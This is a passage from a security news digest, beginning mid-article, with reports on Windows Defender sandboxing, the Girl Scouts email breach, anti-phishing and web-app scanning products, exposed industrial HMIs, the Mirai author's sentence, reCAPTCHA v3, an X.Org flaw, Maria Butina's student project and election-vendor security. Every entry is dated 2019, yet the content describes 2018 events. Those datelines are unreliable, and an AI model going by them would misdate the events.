“The ability to gradually deploy this feature was another important design goal. Because we would be enabling this on a wide range of hardware and software configurations, we aimed to have the ability at runtime to decide if and when the sandboxing is enabled. This means that the entire content scanning logic can work both in-proc and out-of-proc, and it can’t make any assumptions about running with high privileges.” continues Microsoft.

“Users can also force the sandboxing implementation to be enabled by setting a machine-wide environment variable (setx /M MP_FORCE_USE_SANDBOX 1) and restarting the machine. This is currently supported on Windows 10, version 1703 or later.”

To enable the feature use the following procedure:

RUN “CMD” as administrator.
Type: “setx /M MP_FORCE_USE_SANDBOX 1” and then press ENTER
Then restart your computer, that’s it

Girl Scouts data breach exposed personal information of 2,800 members
31.10.2019 securityaffairs

A Girl Scouts of America branch in California suffered a security breach, hackers accessed data of 2,800 girls and their families.
Hackers breached the Orange County, Calif. branch of the Girl Scouts of America, potentially exposing personal information for 2,800 members and their families.

According to the Girl Scouts of Orange County, an unknown threat actor gained access to an email account operated by the organization and used it to send messages.

Girl Scouts of America branch in California

The account was compromised from Sept. 30 to Oct. 1, Girl Scouts of Orange County notified every member whose data has been compromised.

“Out of an abundance of caution, we are notifying everyone whose information was in this email account,” Salcido added.

According to GSOC, the account was used in the past to arrange travel for group members and for this reason hackers may have been able to obtain personal data with their account access.

In a letter sent to members, Christina Salcido, vice president of mission operations for GSOC, confirmed that attackers may have accessed to names, birth dates, home addresses, insurance policy numbers and health history for some members.

Experts warn of possible social-engineering-based cyber attacks leveraging the exposed info.

GSOC will improve the security of the portal used to arrange the members’ travels and in response to the incident deleted any email containing their data

AI-Facilitated Product Aims to Stop Spear-Phishing Attacks
30.10.2019 securityweek

Phishing -- from bulk spam phishing to more targeted spear-phishing and business email compromise (BEC) attacks -- is the number one attack vector faced by business today.

According to Wombat, 76% of organizations experienced phishing attacks in 2017. According to Symantec, by the end of 2017 the average user received 16 malicious emails per month. According to the FBI, global BEC losses from October 2013 to December 2016 had reached $5.3 billion -- a figure that Trend Micro believes could expand to $9 billion for 2018 alone.

INKY, founded in 2008 by Dave Baggett and Simon Smith, has today launched a new AI-based anti-phishing product: INKY Phish Fence. The product is designed to recognize phishing emails. It integrates with Office 365 and Google Cloud services. Incoming mail can be marked clean, suspicious or malicious. Such emails can be dropped, quarantined, or delivered with an inserted banner (yellow or red) to warn the user.

"Phishing is the top attack vector in today's threat landscape as criminals can easily access phishing toolkits on the Dark Web. INKY's ability to uniquely detect brand forgery and phishing attacks through the company's anomaly detection algorithms is a welcome approach to solving such a systemic issue," said Mark Bowker, senior analyst at ESG.

INKY combines machine learning algorithms to analyze content and computer vision techniques to analyze any graphics (such as brand logos) to make its decisions. It builds a social graph of all employees to understand the likelihood of communication between any two destinations.

INKY builds a profile capturing the writing style, geographical route and other properties of each incoming email. This is compared to existing profiles for each sender, potentially generating the red or yellow warning banner.

It looks for fraudulent emails by using computer vision techniques to analyze brand imagery, looking at shapes, proportions, pixel colors and more. It calls on SPF, where implemented by the sender, to determine spoofed domains; and examines WHOIS for further details. The latter has suffered somewhat from GDPR requirements but is not entirely irrelevant.

While there are many anti-phishing products available, it is clear that the problem remains unsolved. Analyzing its own repository of phishing emails, INKY believes that more than half phishing emails get through traditional anti-spam filters. 41.57% pass DKIM; 37.93% pass DMARC; and 59.25% pass SPF.

Last year a new research paper, 'Detecting Credential Spearphishing Attacks in Enterprise Settings', was awarded the Facebook Internet Defense Prize at the 26th USENIX Security Symposium in Vancouver, BC. It proposed a methodology to detect spear-phishing that is specifically targeted and merely contains a link to a malicious URL that probably has a good reputation.

It does not involve machine learning. In fact, the paper states, "With such a small number of known spearphishing instances, standard machine learning approaches seem unlikely to succeed: the training set is too small and the class imbalance too extreme."

INKY founder Dave Baggett doesn't disagree in principle, but does disagree in the practice of INKY Phish Fence.

"We've certainly seen that traditional Bayesian techniques do not work well on phishing emails -- especially spear-phishing emails," he told SecurityWeek. "This is because, as the paper says, these models are entirely built around extracting 'good email' vs 'bad email' signals from the mail; and these signals simply aren't present for many spear-phishing emails. For example," he continued, "spear-phishing emails often don't have a URL, a malware attachment or other easily-identified 'bad mail' property. Likewise, they often do have numerous 'good mail' properties, like being sent from a high-reputation IP (G Suite or O365) or being DKIM-signed."

He believes there are two primary reasons that Phish Fence succeeds against the odds. First, the team uses semi-supervised machine learning techniques that boost the efficacy of machine learning modules where there is only small amount of labeled data available. Furthermore, he adds, "For us, training examples aren't just spear-phishing emails, but all emails sent to and from a particular target of impersonation. That's a much larger data set."

The second reason, he continued, "We're not forced to make a binary decision between 'good mail' and 'bad mail' anyway, since we have the 'third way' of communicating exactly what we thought was unusual to the end user by adding a yellow warning banner."

The banner shows up on any endpoint -- and not just Outlook or Gmail -- because it constitutes a modification of the email itself. "While this seems like it would be trivial to do," he said, "there's a long tail of details that make it hard in practice. That's probably why nobody else does it even though it's so helpful for dealing with the cases where a mail is in between 'bad' and 'good'."

Backed by ClearSky Security, Gula Tech Adventures and Blackstone, INKY raised $5.6 million in Series A funding in June 2018. "There is an obvious lack of innovation around detecting and preventing today's sophisticated phishing attacks," said Ron Gula, Founder of Gula Tech Adventures. "With the launch of INKY Phish Fence, enterprises will now be able to detect and prevent against the industry's most common, yet formidable vectors. Investing in this space is incredibly important as the first line of defense against attackers gaining access to sensitive data."

92% of External Web Apps Have Exploitable Security Flaws or Weaknesses: Report
30.10.2019 securityweek

According to new research, 98% of leading companies across the U.S. and Europe are vulnerable to cybercriminals through their web applications. While this figure may seem high, it will surprise neither the companies themselves nor independent security experts.

Most large companies readily admit that they have shadow IT and legacy applications they do not know, and that this at least theoretically makes them vulnerable. It is generally considered to be an acceptable risk.

The purpose of this research from High-Tech Bridge (HTB) is designed to show that the problem is far bigger and less acceptable than most companies imagine. It was prompted, at least in part, by HTB's experience with one particular U.S. government agency client.

"They told us," HTB founder and CEO Ilia Kolochenko told SecurityWeek, "'We know we have shadow IT -- about 250 applications." HTB used its non-intrusive scanning tools and replied, "No, you have 8000 shadow IT applications." The implication is that this government agency has around 7,750 shadow IT applications that it doesn't know and isn't monitoring -- leaving it potentially vulnerable to an unquantifiable risk.

For its new research, HTB used its four free non-intrusive scanning products (Discovery, SSLScan, WebScan and Mobile App Scanner) to quantify the vulnerabilities and weaknesses of the FT U.S. 500 companies, and the FT Europe 500 companies. It is important to note that these non-intrusive scans do not detect all vulnerabilities -- only those that are exposed to the internet. But if HTB can see them via the internet, so can hackers.

The figures returned are quite staggering. First the basics. The 500 largest U.S. companies have 293,512 external systems accessible from the internet. 42,549 have a live web application with dynamic content and functionality. The figures for the 500 largest European companies are 112,750 and 22,162. Kolochenko points out that the figures are skewed somewhat by the sheer size of some of the American firms, with the likes of Apple, Google, Facebook and Microsoft each having many thousands of servers and many thousands of applications.

The results do not compare U.S. and European companies. Apart from the size differential there is a culture differential. Europe is conservative while the West Coast in particular is the home of innovation and experimentation. The U.S. and Europe are apples and pears; and the spread of firms chosen was simply to give a geographically dispersed view of the problem.

Nevertheless, these first figures show, according to the report, "a US company has an average of 86.5 applications that can be easily discovered externally and are not protected by 2FA, strong authentication or other security controls aimed to reduce application accessibility to untrusted parties. As for an EU company, there are 46 such applications per company."

HTB has its own method of grading installations based on a score out of 100 and ranging from A to F. The research found that 48.1% of U.S. web servers achieve an A grade for their SSL/TLS encryption -- but 32.21% have an F grade. In fact, 7.82% still have the vulnerable and deprecated SSL v3 protocol enabled. In Europe, the figures are 62.4% at A, 16.02% at F, and 5.15% with SSLv3 enabled.

The research also examined external indications of compliance with PCI DSS and GDPR to gauge the level of security for the internet-facing applications. For PCI, it shows that only 16.4% of the U.S. web servers have an SSL/TLS configuration compliant with PCI DSS 3.2.1 (and only 14.7% in Europe). The report notes, "a configuration non-compliant with PCI DSS does not necessarily mean poor encryption, but in many cases it does."

On indications of GDPR compliance, 16.2% of the US companies have at least two web applications that permit entry of personally identifiable information (PII) (e.g. via web forms) and run a vulnerable version of SSL/TLS, and/or outdated and vulnerable CMS or other web software. It is only slightly lower in Europe at 15.4%. "Numbers of non-compliant web applications may likely be much higher," comments the report, "but it is impossible to say how many of the outdated and vulnerable websites actually process or store PII without conducting intrusive tests."

You get the picture. The sheer quantity of weaknesses, concerns and vulnerabilities exposed by even the largest companies is far greater than most people would realize. But this is just the beginning. HTB's research also found:

• only 2.94% of U.S. companies achieve an A grade for properly implemented security hardening and configuration of web servers. Most, 76.9% score an F. The scores in Europe are almost identical at 2.98% and 76.9%.

• only 9.1% of U.S. companies have an enabled and properly configured content security policy (CSP) which is used to mitigate XSS and CSRF attacks on the server side. It is worse in Europe at just 4.39%.

• as many 8% of web applications in the U.S. (15.8% in Europe) use third-party software (CMS, JQuery, SharePoint) that is outdated and contains at least one publicly disclosed vulnerability

• 94% of all U.S. WordPress installations (99.5% in Europe) have a default admin location not protected by other means such as supplementary .htaccess authentication or IP whitelisting, making authentication attacks -- including via compromised plug-ins) much simpler

• 98.4% of U.S. web applications (98.1% in Europe) have no web application firewall (WAF) or have it in a too permissive mode

• 0.91% of the U.S web applications (0.63% in Europe) provide an exposed web interface to internal ICS/SCADA or IoT systems

• 27% of U.S. companies (12% of European companies) have at least one external cloud storage (for example, an S3 bucket) accessible from the internet without any authentication. HTB's non-intrusive scanning does not know what the storage contains, but the report comments, "Some files in storages are expressly marked as ìinternalî pointing out that these cloud resources are probably not intended for public availability."

• 221 U.S. companies have a total of 1,232 vulnerability submissions on Open Bug Bounty -- of which 462 have not been patched. 162 European companies have 625 vulnerability submissions, of which 210 remain unpatched

• 62% of the U.S companies have at least one website access being sold on the Dark Web (78% of European companies)

However, knowing the size of the problem is no help to an overworked CISO. He or she is probably already aware that problems exist, although most likely not to this extent. The problem is knowing where to start.

High-Tech Bridge has also launched a new product: Immuniweb AI Discovery. It can locate the problems listed above, but then uses machine learning techniques to relate the problems to HTB's own Big Data compilation of more than 853,783,291 known vulnerabilities and weaknesses in web applications. This data is compiled from all publicly available sources and added to HTB's own research. From this it can return a 'hackability score' and an 'attractive score'.

HTB first finds the problems, and then uses artificial intelligence to tell the company which issues are most easily exploited, and which issues are most likely to be exploited. In effect, it provides the CISO with a risk management-based roadmap for tackling the most critical vulnerabilities in his or her internet-facing infrastructure -- many of which may well have been unknown.

For the acid test, SecurityWeek asked Kolochenko if AI Discovery would have picked out and highlighted the Struts vulnerability exploited in the Equifax hack. Ever a stickler for accuracy and precision, Kolochenko replied, "It could have. It would not if the server concerned was disconnected from the internet at the time of the scan, or if an insider had taken other steps to hide it. Otherwise, it would have."

There are other products able to locate internet-facing security issues. What AI Discovery does is rank them in a 'fix-priority' order for CISOs. All the statistics used for this research came via HTB's free products. AI Discovery is a new paid-for product.

Internet-Exposed HMIs Put Energy, Water Facilities at Risk: Report
30.10.2019 securityweek

Malicious actors could cause serious damage to organizations in the energy and water sectors by targeting their human-machine interfaces (HMIs), according to a report released by Trend Micro on Tuesday.

The security firm’s researchers have used the Shodan search engine and other sources to find Internet-exposed industrial control systems (ICS), particularly HMIs. They showed how attackers could find the physical location of energy and water companies using public sources, and then map the locations to IP addresses through geolocation services such as Maxmind.

Experts noted that while these geolocation services are not very accurate, they do provide a list of possible IP addresses, which the attacker can validate using Shodan or port scans.

They discovered tens of devices used by oil and gas, power systems, water utility, and biogas organizations located in Europe, the United States and other parts of the world. Researchers found that in many cases the HMIs were accessible via unauthenticated VNC servers, allowing potential attackers to interact with their interface using VNC viewer applications.

The number of exposed devices was relatively small and all systems were housed by small and medium-size companies. However, researchers warn that these smaller companies can have a significant impact on the security posture of large corporations as they are often part of the supply chain.

Many of the identified HMIs included critical functionality, including for alarms, changing parameters, and starting or stopping processes. If malicious hackers gain access to these systems, they could easily cause failures or inflict significant damage.

Internet-exposed HMI

For example, one of the exposed HMIs was used by a water treatment plant. An attack on the facility via the exposed system could lead to drinking water shortages or a public health crisis caused by waterborne diseases, Trend Micro said.

Another exposed HMI belonged to an oil and gas company. An attacker with access to this device could shut down oil and gas wells, potentially causing a state-level or national shortage, the security firm warned.

Similarly damaging attacks could also be launched against solar farms, power plants, and hydroelectric facilities controlled and monitored using the HMIs identified by researchers.

In addition to hijacking the HMI and conducting various activities via its interface, experts warned that malicious actors could launch distributed denial-of-service (DDoS) attacks that cause disruptions to critical processes and result in serious material damage, exploit vulnerabilities in the HMI systems themselves, and abuse them for lateral movement within the targeted organization’s network.

Trend Micro researchers did not expect to find too many individuals interested in industrial systems on underground cybercrime forums, as these types of campaigns are typically the work of state-sponsored groups. However, they were surprised to see that there are some threat actors looking to acquire credentials for ICS/SCADA systems. Experts also found requests to disrupt the industrial systems of competitors, and opportunistic sellers trying to monetize data stolen from industrial facilities.

“While the number of exposed energy and water devices/systems that we discovered was relatively small, it is still a cause for concern because these systems should not be exposed online in the first place,” Trend Micro said in its report. “The good news is that we didn’t find exposed assets from the well-known big corporations and/or state owned entities that operate CI. The exposed assets that we found were mostly owned/operated by small companies. However attackers are not bound by the same restrictions that researchers are bound by — so this does not mean larger companies are necessarily fully secure. The bad news is that smaller companies frequently are part of the supply chain that feeds resources to big corporations; thus, a cyberattack against a small company can indirectly affect bigger corporations.”

The author of the Mirai botnet gets six months of house arrest
30.10.2019 securityáffairs

Paras Jha (22), the author of the Mirai botnet has been sentenced to six months of house arrest and ordered to pay $8.6 million in compensation for DDoS attacks against the systems of Rutgers University.
A New Jersey court sentenced the author of the Mirai botnet, Paras Jha, 22, of Fanwood, after pleading guilty to violating the Computer Fraud and Abuse Act (CFAA).

The man has been sentenced to six months of house arrest and ordered to pay $8.6 million in compensation for DDoS attacks against the systems of Rutgers University.

The man was also condemned to 2,500 hours of community service and five years of supervised release.

Jha pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet.

“Jha’s attacks effectively shut down Rutgers University’s central authentication server, which maintained, among other things, the gateway portal through which staff, faculty, and students delivered assignments and assessments,” reads the press release from the US Justice Department.

“At times, Jha succeeded in taking the portal offline for multiple consecutive periods, causing damage to Rutgers University, its faculty, and its students.”

In September, Jha and two accomplices admitted to be the authors of the infamous botnet and avoided the jail after helping feds in another cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online with the moniker “Anna-senpai” is the author of the IoT bot, he leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making hard the attribution of the attacks.

According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

mirai botnet

In September, the men were sentenced to five years of probation and 2,500 hours of community service. The judges also required them to repay $127,000, and they have voluntarily handed over huge amounts of cryptocurrency that the authorities seized as part of the investigation on the botnet.

Google Launches reCAPTCHA v3
30.10.2019 securityweek

Google on Monday announced the launch of reCAPTCHA v3, which aims to improve user experience by removing the need for challenges.

reCAPTCHA is the security service provided by Google for protecting websites from spam and abuse. reCAPTCHA v1 asked every user to read a distorted text and enter it into a box. The second version has brought significant improvements as it leverages various other types of data to determine if a request comes from a bot or a human, allowing many users to access content simply by ticking a box.

With reCAPTCHA v3, Google is making user experience even more frictionless by running adaptive risk analysis in the background and providing a score that tells website owners how suspicious an interaction is.

The score can be used to define “action” tags, which allow administrators to specify the key steps users have to take. The score ranges between 1.0, which indicates that the user is very likely human, and 0.0, which is very likely a bot.

Google recommends adding reCAPTCHA v3 to multiple pages for a more accurate risk analysis. The reCAPTCHA admin console provides information on scores and actions, and it helps users identify pages targeted by bots.

The Internet giant says the reCAPTCHA v3 score can be used for several purposes. One of them is setting a threshold that specifies if a user will be let through or if further verification is required. The default recommended threshold is 0.5.

Administrators are advised to take action behind the scenes — for example, requiring two-factor authentication to prevent credential stuffing, or sending suspicious comments on social channels for moderation — rather than blocking traffic altogether.

The score can also be combined with other data collected by website owners, including transaction histories and user profiles, for an even more accurate verification. Google says the score can also be useful for training machine learning models designed to detect abuse.

“By providing you with these new ways to customize the actions that occur for different types of traffic, this new version lets you protect your site against bots and improve your user experience based on your website’s specific needs,” said Wei Liu, product manager at Google.

X.Org Flaw Exposes Unix-Like OSes to Attacks
30.10.2019 securityweek

Several Unix-like operating systems are affected by a potentially serious X.Org vulnerability that can be exploited for privilege escalation and arbitrary code execution.

X.Org is a popular open source implementation of the X Windows System (also known as X11, X or X-Windows), the graphical windowing system used by BSD and Linux operating systems.

Narendra Shinde discovered that X.Org X Server versions 1.19 and later are affected by an arbitrary file overwrite vulnerability that can be exploited by an authenticated attacker to elevate permissions and execute arbitrary code with root privileges.

The security hole, tracked as CVE-2018-14665, was introduced nearly two years ago and it affects operating systems that run X Server with elevated privileges.

“Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary files overwrite, when the X server is running with elevated privileges (ie when Xorg is installed with the setuid bit set and started by a non-root user),” X.Org developers said in an advisory.

The list of impacted operating systems includes Red Hat, CentOS, Debian, Ubuntu, and OpenBSD.

Some security experts pointed out that the vulnerability is very easy to exploit — they published a proof-of-concept (PoC) that can fit into a single tweet. While local access is normally required for exploitation, remote attackers can also — in certain circumstances — leverage the vulnerability to take control of a vulnerable system.

Code execution vulnerability found in X.Org

X.Org developers released a patch on October 25 and operating systems have also started creating fixes. There is also a workaround, but some users may not be able to apply it.

Shinde said he reported the vulnerability to Red Hat on October 10 and X.Org developers two days later. OpenBSD developers, however, were displeased with the fact that they were only notified an hour before the flaw was disclosed.

Russian Held as Agent Studied US Groups' Cyberdefenses
30.10.2019 securityweek

A year before federal prosecutors accused Maria Butina of operating as a secret agent for the Russian government, she was a graduate student at American University working on a sensitive project involving cybersecurity.

Butina's college assignment called for her to gather information on the cyberdefenses of U.S. nonprofit organizations that champion media freedom and human rights, The Associated Press has learned. It was information that could help the groups plug important vulnerabilities, but also would be of interest to the Russian government.

In fact, the Russians previously had in their sights at least two of the groups that she and other students interacted with.

Butina participated in the project under the tutelage of a respected professor who advised the State Department on cybersecurity matters. It was carried out for the nonprofit group Internews, which works extensively with the U.S. government to bolster the free flow of information in dangerous parts of the world and has drawn Russian ire with some of its programs in Russia and neighboring countries. The group also advises other nonprofits on cybersecurity.

Internews confirmed Butina's involvement and a broad description of what the project involved. A lawyer for Butina did not respond to a request for comment.

Butina's project raised few eyebrows before her July arrest, despite the fact that news reports already had posed questions about her rapid rise from selling furniture in Siberia and her ties with Kremlin officials.

As part of the project, a small group of students led by Butina was given a list of Internews partners working on human rights and press freedom issues for research purposes only, with the understanding that they not be contacted without consultation. But the students contacted some of the groups anyway, according to people involved in the project who spoke on condition of anonymity because they were not authorized to describe the work.

An individual who has worked on U.S. programs in Ukraine told the AP that after Butina's arrest he was briefed by U.S. officials who expressed concern that two Internews programs in Ukraine — dealing with media freedom and cybersecurity, and funded by the State Department — may have been exposed to Russian intelligence and may be at risk due to Butina's student work.

State Department spokesman Robert Palladino said the department was not involved with the Internews project Butina worked on.

"We have verified that all documents Internews provided to its students were publicly available, and we remain confident in the integrity of the State Department's programs with Internews," he said.

Kostiantyn Kvurt, who heads a local nonprofit that Internews helped establish, Internews Ukraine, said he was unaware of Butina's project before being informed of it by the AP, but already was wary of potential Russian intelligence interference.

"If they understand how to break our firewalls, they could find our partners," Kvurt said. "People could get detained, tortured, killed."

Internews said the students were never given access to the group's work or systems.

"The selection of the students and their roles and activities in the research was solely determined by AU faculty," spokeswoman Laura Stein Lindamood said. "Internews is currently reviewing our relationship with university-led student projects."

The access that Butina won through her coursework illustrates how academia and the extensive network of entities that often carry out sensitive, but not classified, work for the U.S. government remain national security vulnerabilities.

In this case, all the institutions expected someone else to vet Butina. Internews thought American University stood behind her; the university said it doesn't do background checks and expects the State Department to vet foreign applicants fully before issuing visas.

Prosecutors allege in court documents that attending the university was Butina's "cover" as she cultivated political contacts and ties with the National Rifle Association. They contend she was part of a clandestine political influence campaign directed by a former Russian lawmaker who has been sanctioned by the U.S. Treasury Department for his alleged ties to Russian President Vladimir Putin.

John Sipher, who once ran the CIA's Russian operations, said Butina fits the profile of the kind of lightly trained asset frequently used to help identify espionage targets without attracting attention from counterintelligence, which is often focused on high-level contacts with government officials.

"The project is perfect, because a student can do that research legitimately," Sipher said. "You can just imagine why that would be of interest. It's a sort of gold mine."

Butina's student project was led by Eric Novotny, a cybersecurity expert who has a high security clearance as an adviser to the State Department. One of Novotny's AU courses was called "Cyber Warfare, Terrorism, Espionage, and Crime." The project was aimed at helping Internews identify ways that it could help U.S.-based nonprofits improve their cybersecurity.

Novotny told the AP that even after press reports about Butina raised questions about her connections to the Russian government, he was obligated to treat her like any other student.

"I have always observed university policies and rules during my entire academic career," he said.

The university declined comment, citing federal privacy rules.

After the spring semester, Butina and three other students signed on to the work-study project, according to people familiar with the work, who spoke on condition of anonymity because they were not authorized to discuss it publicly.

One of the organizations that Butina contacted, the prominent digital rights organization Electronic Frontier Foundation, had frequent contact with Internews on cybersecurity issues before and had previously been a Russian target. But Butina did not mention Internews in a June 14, 2017, encrypted email reviewed by the AP.

In the email, addressed to cybersecurity director Eva Galperin, she wrote: "My name is Maria Butina and I'm the captain of an American University student group doing research on U.S (civil society organizations) and their cyber security challenges. We have several questions about cyber security concerns facing human rights organizations and your expertise would be very beneficial."

Novotny, who was later interviewed by the FBI about Butina, learned his instructions about not reaching out to partners had been ignored when the cybersecurity adviser of one nonprofit called him after becoming suspicious that a Russian student was asking about cyber vulnerabilities. He sternly warned the students not to ignore the protocol.

Research published by Toronto University-based The Citizen Lab analyzing Russian hacking attempts has found that civil society groups ranked behind only governments as the most frequent targets. Most often, it appeared Russian spies were trying to determine who the organizations were working with in places of strategic interest, the research found.

"Russian security services view civil society groups as a threat and treat their local partners with great suspicion." said John Scott-Railton, a cybersecurity researcher at Citizen Lab.

AP found no evidence that Butina passed any information from the university project to Moscow, but the work allowed her to contact likely Russian targets.

It's not clear why Butina's work raised concerns for the two Internews programs in Ukraine, which has not been a focus of prosecutors' case against her. But Ukraine has been a hotspot of U.S.-Russian tensions, where the two countries vie for influence.

The U.S. runs multiple programs aimed at strengthening democracy and boosting pro-Western sentiment in Russia's backyard and in parts of the world where America and Russia are vying for influence. Often they are run by contractors or nonprofit groups. By penetrating the programs, the Russians could determine who the organizations are working with and learn details about their security measures.

The Electronic Frontier Foundation often helps train at-risk civil society groups both in the U.S. and abroad. In recent years, it also has turned its attention to the scourge of state-sponsored malicious software, publishing reports on suspected government-backed hacking campaigns in Kazakhstan, Syria and Lebanon.

In 2015, the organization said Google had alerted it to a knockoff EFF site "almost certainly" operated by the infamous Russian cyberespionage ring now widely known as Fancy Bear. U.S. authorities say the hackers — who rattled the 2016 U.S. presidential campaign by releasing tens of thousands of Democrats' emails — are members of Russia's military intelligence agency.

Galperin said she had a conference call with Butina and the other students, but did not make the connection with the arrested Russian until the AP contacted her. She said the students asked general questions about the threat landscape, and that she passed along no sensitive information.

Butina later widened her search for contacts, posting a solicitation for the project on Facebook that began: "S.O.S. Poor Students Need Help from Civil Society Organizations!"

"My dear American FB friends and followers, I am looking for volunteers for a brief interview of the U.S. civil society organizations for a student research project," she wrote in July. "If you a leader of an organization registered in the United States dealing with human rights (domestically or abroad) and willing to talk online (via Skype or conference call) ... please send me a private message."

Novotny was not informed about the post.

After the student group prepared a report for Internews, Butina continued her cyberpolicy studies. Soon after she finished her spring semester this year, U.S. authorities charged her with trying to influence senior U.S. politicians and infiltrate political organizations on behalf of the Russian government.

US Election Integrity Depends on Security-Challenged Firms
30.10.2019 securityweek

It was the kind of security lapse that gives election officials nightmares. In 2017, a private contractor left data on Chicago's 1.8 million registered voters — including addresses, birth dates and partial Social Security numbers — publicly exposed for months on an Amazon cloud server.

Later, at a tense hearing , Chicago's Board of Elections dressed down the top three executives of Election Systems & Software, the nation's dominant supplier of election equipment and services.

The three shifted uneasily on folding chairs as board members grilled them about what went wrong. ES&S CEO Tom Burt apologized and repeatedly stressed that there was no evidence hackers downloaded the data.

The Chicago lapse provided a rare moment of public accountability for the closely held businesses that have come to serve as front-line guardians of U.S. election security.

A trio of companies — ES&S of Omaha, Nebraska; Dominion Voting Systems of Denver and Hart InterCivic of Austin, Texas — sell and service more than 90 percent of the machinery on which votes are cast and results tabulated. Experts say they have long skimped on security in favor of convenience, making it more difficult to detect intrusions such as occurred in Russia's 2016 election meddling.

The businesses also face no significant federal oversight and operate under a shroud of financial and operational secrecy despite their pivotal role underpinning American democracy.

In much of the nation, especially where tech expertise and budgets are thin, the companies effectively run elections either directly or through subcontractors.

"They cobble things together as well as they can," University of Connecticut election-technology expert Alexander Schwartzman said of the industry leaders. Building truly secure systems would likely make them unprofitable, he said.

The costs of inadequate security can be high. Left unmentioned at the Chicago hearing: The exposed data cache included roughly a dozen encrypted passwords for ES&S employee accounts . In a worst-case scenario, a sophisticated attacker could have used them to infiltrate company systems, said Chris Vickery of the security firm Upgard, which discovered the data lapse.

"This is the type of stuff that leads to a complete compromise," he said. ES&S said the passwords were only used to access the company's Amazon cloud account and that "there was no unauthorized access to any data or systems at any time."

All three of the top vendors declined to discuss their finances and insist that security concerns are overblown. ES&S, for instance, said in an email that "any assertions about resistance to input on security are simply untrue" and argued that for decades the company has "been successful in protecting the voting process."


Many voting systems in use today across the more than 10,000 U.S. election jurisdictions are prone to security problems. Academic computer scientists began hacking them with ease more than a decade ago, and not much has changed.

Hackers could theoretically wreak havoc at multiple stages of the election process. They could alter or erase lists of registered voters to sow confusion, secretly introduce software to flip votes, scramble tabulation systems or knock results-reporting sites offline.

There's no evidence any of this has happened, at least not yet.

The vendors say there's no indication hackers have penetrated any of their systems. But authorities acknowledge that some election mischief or malware booby traps may have gone unnoticed.

On July 13, U.S. special counsel Robert Mueller indicted 12 Russian military intelligence operatives for, among other things, infiltrating state and local election systems. Senior U.S. intelligence officials say the Kremlin is well-positioned to rattle confidence in the integrity of elections during this year's midterms, should it choose to.

Election vendors have long resisted open-ended vulnerability testing by independent, ethical hackers — a process that aims to identify weaknesses an adversary could exploit. Such testing is now standard for the Pentagon and major banks.

While the top vendors claim to have stepped up their cybersecurity game, experts are skeptical.

"The industry continues to stonewall the problem," said Bruce McConnell, a Department of Homeland cybersecurity czar during the Obama administration. Election-vendor executives routinely issue assurances, he said, but don't encourage outsiders to inspect their code or offer "bug bounties" to researchers to seek out flaws in their software.

Sen. Ron Wyden, an Oregon Democrat, has long criticized what he calls the industry's "severe underinvestment in cybersecurity." At a July hearing, he accused the companies of "ducking, bobbing and weaving" on a series of basic security questions he'd asked them.

ES&S told The Associated Press that it allows independent, open-ended testing of its corporate systems as well as its products. But the company would not name the testers and declined to provide documentation of the testing or its results.

Dominion's vice president of government affairs, Kay Stimson, said her company has also had independent third parties probe its systems but would not name them or share details. Hart InterCivic, the No. 3 vendor, said it has done the same using the Canadian cybersecurity firm Bulletproof, but would not discuss the results.

ES&S hired its first chief information security officer in April. None of the big three vendors would say how many cybersecurity experts they employ. Stimson said that "employee confidentiality and security protections outweigh any potential disclosure."


Experts say they might take the industry's security assurances more seriously if not for the abundant evidence of sloppy software development, a major source of vulnerabilities.

During this year's primary elections, ES&S technology failed on several fronts.

In Los Angeles County, more than 118,000 names were left off printed voter rolls. A subsequent outside audit blamed sloppy system integration by an ES&S subsidiary during a database merge.

No such audit was done in Kansas' most populous county after a different sort of error in newly installed ES&S systems delayed the vote count by 13 hours as data uploading from thumb drives crawled.

University of Iowa computer scientist Douglas Jones said both incidents reveal mediocre programming and insufficient pre-election testing. And voting equipment vendors have never seemed security conscious "in any phase of their design," he said.

For instance, industry leader ES&S sells vote-tabulation systems equipped with cellular modems, a feature that experts say sophisticated hackers could exploit to tamper with vote counts. A few states ban such wireless connections; in Alabama, the state had to force ES&S to remove them from machines in January.

"It seemed like there was a lot more emphasis about how cool the machines could be than there was actual evidence that they were secure," said John Bennett, the Alabama secretary of state's deputy chief of staff.

California conducts some of the most rigorous scrutiny of voting systems in the U.S. and has repeatedly found chronic problems with the most popular voting systems. Last year, a state security contractor found multiple vulnerabilities in ES&S's Electionware system that could, for instance, allow an intruder to erase all recorded votes at the close of voting.

In 2014, the same contractor, Jacob Stauffer of the security firm Coherent Cyber, found "multiple critical vulnerabilities" in Dominion's Democracy Suite that could allow skilled hackers to compromise an election's outcome.

"These systems are Frankenstein's monster, essentially," Stauffer said.

The federal Department of Homeland Security began offering confidential vulnerability testing to vendors over the summer. But only one vendor has submitted to such testing, said an agency official who spoke on condition of anonymity because the official was not authorized to discuss the matter publicly.


More competition might help, but industry barriers to smaller vendors are "absolutely enormous," said Larry Moore, president of upstart Clear Ballot. Its auditable voting system took two and a half years to win federal certification at a cost of $1 million.

Startups are hard-pressed to disrupt an industry whose main players rely heavily on proprietary technologies. ES&S and other vendors have jealously guarded them in court — and also unleash lawyers against election officials who purchase competitors' products.

In October, ES&S sued Cook County, Illinois, seeking to void its $30 million, 10-year contract with a competitor. It also recently threatened Louisiana and Douglas County, Kansas, with lawsuits for choosing other suppliers.

Cook County elections director Noah Praetz said litigious behavior only chills modernization. Competition and innovation are already hampered in an industry with "really low" margins, especially considering limited government funding for election equipment.

"The market isn't functioning real well," he said.


Elections are run by the states, whose oversight of suppliers varies. California, New York and Colorado are among states that keep a close eye on the vendors, but many others have cozier relationships with them.

And the vendors can be recalcitrant. In 2017, for instance, Hart InterCivic refused to provide Virginia with a paperless e-Slate touchscreen voting machine for testing, said Edgardo Cortes, then the state election commissioner.

